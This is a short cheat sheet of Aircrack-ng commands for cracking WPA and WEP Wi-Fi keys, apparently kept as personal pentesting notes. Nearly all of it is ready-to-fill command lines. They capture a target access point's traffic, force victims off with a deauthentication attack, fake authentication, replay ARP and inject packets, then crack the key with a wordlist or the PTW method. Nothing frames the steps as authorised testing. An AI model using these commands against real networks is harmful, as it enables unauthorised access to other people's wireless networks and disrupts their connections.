Aircrack-ng

#CRACKING WPA

airmon-ng start wlan0
airodump-ng -c (channel) --bssid (AP MAC) -w (filename) wlan0mon
aireplay-ng -0 1 -a (AP MAC) -c (VIC CLIENT) wlan0mon {deauthentication attack}
aircrack-ng -0 -w (wordlist path) (capture filename)

#CRACKING WEP WITH CONNECTED CLIENTS

airmon-ng start wlan0 (channel)
airodump-ng -c (channel) --bssid (AP MAC) -w (filename) wlan0mon
aireplay-ng -1 0 -e (ESSID) -a (AP MAC) -h (OUR MAC) wlan0mon {fake authentication}
aireplay-ng -0 1 -a (AP MAC) -c (VIC CLIENT) wlan0mon {deauthentication attack}
aireplay-ng -3 -b (AP MAC) -h (OUR MAC) wlan0mon {ARP replay attack}

#CRACKING WEP VIA A CLIENT

airmon-ng start wlan0 (channel)
airodump-ng -c (channel) --bssid (AP MAC) -w (filename) wlan0mon
aireplay-ng -1 0 -e (ESSID) -a (AP MAC) -h (OUR MAC) wlan0mon {fake authentication}
aireplay-ng -2 -b (AP MAC) -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 wlan0mon
aireplay-ng -2 -r (replay cap file) wlan0mon {inject using cap file}
aircrack-ng -0 -z -n 64 filename.cap {-z = PTW method, -n 64 = 64-bit key}
